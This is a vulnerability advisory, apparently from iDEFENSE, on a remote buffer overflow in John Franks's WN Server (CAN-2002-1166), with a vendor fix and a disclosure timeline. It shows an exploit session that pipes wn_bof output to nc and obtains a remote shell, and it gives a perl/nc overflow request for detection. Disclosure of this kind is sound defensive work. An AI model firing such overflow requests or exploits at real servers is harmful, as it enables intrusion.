I. BACKGROUNDJohn Franks's WN Server is an HTTP server designed to provide functionality usually available only with complex CGI programs without the necessity of writing or using these programs. It is included in the latest FreeBSD ports collection. More information about it is available at http://hopf.math.nwu.edu/.
II. DESCRIPTIONRemote exploitation of a buffer overflow in WN Server could allow arbitrary code execution under the privileges of the targeted server. Exploitation is possible by issuing WN Server a long GET request. Customized shell code is required to bypass the character filtering that WN Server imposes on the requested URI.
III. ANALYSISThe following is a snapshot of an exploit at work:
$ (./wn_bof 0 3; cat) | nc target 80
Trying ret=0xbfbeb4ec
$ id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
$ uname
FreeBSD
Exploitation of a buffer overflow usually results in one of two things: the targeted host process/application/host crashes, or arbitrary code executes. Both have serious repercussions, but in most cases, code execution is more threatening in that it could allow for the further usurpation of higher-level privileges on the targeted host.
IV. DETECTIONWN Server 1.18.2 through 2.0.0, which are included in the FreeBSD ports collection, are affected. Do the following to determine whether a specific WN implementation is susceptible:
1. Ensure that WN is running and open two terminals.
2. In the first terminal execute the command "perl -e 'print "GET /"
. "a"x1600';cat)|nc localhost 80"
3. In the second terminal, determine the process ID of the child
that was spawned to handle the previous command, and attach
GDB to it via the following command set:
# ps ax | grep swn
4223 ?? Ss 0:00.29 ./swn
4711 ?? S 0:00.01 ./swn
# gdb ./swn 4711
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
...
4. In the second terminal, type 'c'. This tells GDB to continue.
5. In the first terminal, press 'enter'. If at this point the following
output is returned from GDB, then a vulnerable WN
implementation is running:
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
V. WORKAROUNDNo workaround is available as of this writing.
VI. VENDOR FIX/RESPONSEJohn Franks released WN Server 2.4.4, which corrects this problem. It is available at http://hopf.math.nwu.edu/wn-2.4.4.tar.gz.
VII. CVE INFORMATIONThe Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project assigned the identification number CAN-2002-1166 for this issue.
VIII. DISCLOSURE TIMELINE
| 8/29/2002 |
Issue disclosed to iDEFENSE |
| 9/24/2002 |
John Franks notified via e-mail to john@math.northwestern.edu |
| 9/24/2002 |
iDEFENSE clients notified |
| 9/24/2002 |
Vendor response received |
| 9/30/2002 |
Issue disclosed to public |
IX. CREDITbadc0ded (badc0ded@badc0ded.com) is credited with discovering this vulnerability.
